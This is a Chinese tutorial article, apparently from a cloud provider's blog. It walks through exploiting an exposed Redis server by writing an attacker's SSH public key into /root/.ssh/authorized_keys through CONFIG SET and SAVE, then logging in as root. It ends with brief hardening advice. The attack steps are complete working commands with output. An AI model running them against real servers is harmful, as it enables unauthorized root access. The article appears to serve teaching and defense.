溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Redis挖礦原理的示例分析

發(fā)布時(shí)間:2022-02-24 09:37:06 來源:億速云 閱讀:159 作者:小新 欄目:關(guān)系型數(shù)據(jù)庫

這篇文章主要介紹Redis挖礦原理的示例分析,文中介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們一定要看完!

演示一下如果通過Redis進(jìn)行提權(quán)獲取遠(yuǎn)程服務(wù)器的Root用戶。

1、首先我們需要一些先決條件

  • 條件一:你首先要有一個(gè)Redis,并且我們要知道他的端口【默認(rèn)6379】;

  • 條件二:Redis的密碼不能過于復(fù)雜,或者沒有密碼;

  • 條件三:啟動Redis的用戶最好是Root用戶,這樣破壞性更大;

2、開始搞事情

  • 2.1 創(chuàng)建一對秘鑰

通過ssh-keygen生成一對,當(dāng)然可以使用已經(jīng)有的都沒有問題。

root@kali:/usr/local/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

接下來通過公鑰生成攻擊鍵值

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt

內(nèi)容如下

root@kali:/tmp/rediskey# cat foo.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

這里前后增加兩個(gè)換行符是為了防止數(shù)據(jù)連接在一起造成失效問題。

  • 2.2 配置Key到Redis中

操作如下:

root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK

登錄Redis進(jìn)行檢查,是否已經(jīng)寫入進(jìn)Redis中。

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
  • 2.3 通過Redis保存機(jī)制替換系統(tǒng)文件

且看如下操作

192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit

這個(gè)時(shí)候,我們登錄遠(yuǎn)程主機(jī)看下效果。

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~#

OK,到這里我們已經(jīng)提權(quán)成功了,那我們看下導(dǎo)出文件到底是什么呢?其實(shí)就是Redis的保存文件形式罷了,有興趣可以自己打開看看,這里不再展示。

3、如何預(yù)防

這個(gè)漏洞威力還是挺大的,我們現(xiàn)在只是拿到主機(jī)權(quán)限一個(gè)而已,加入放到定時(shí)任務(wù)執(zhí)行一些腳本然后在批量感染呢?

防范的技巧如下:

  • Redis不要監(jiān)聽在危險(xiǎn)IP上,如果有請加防火墻控制

  • Redis一定要增加密碼限制,且不能是弱口令;

  • Redis盡量不要用Root用戶身份來啟動。

做到如上三點(diǎn)防范Redis挖礦,沒問題的

以上是“Redis挖礦原理的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對大家有幫助,更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI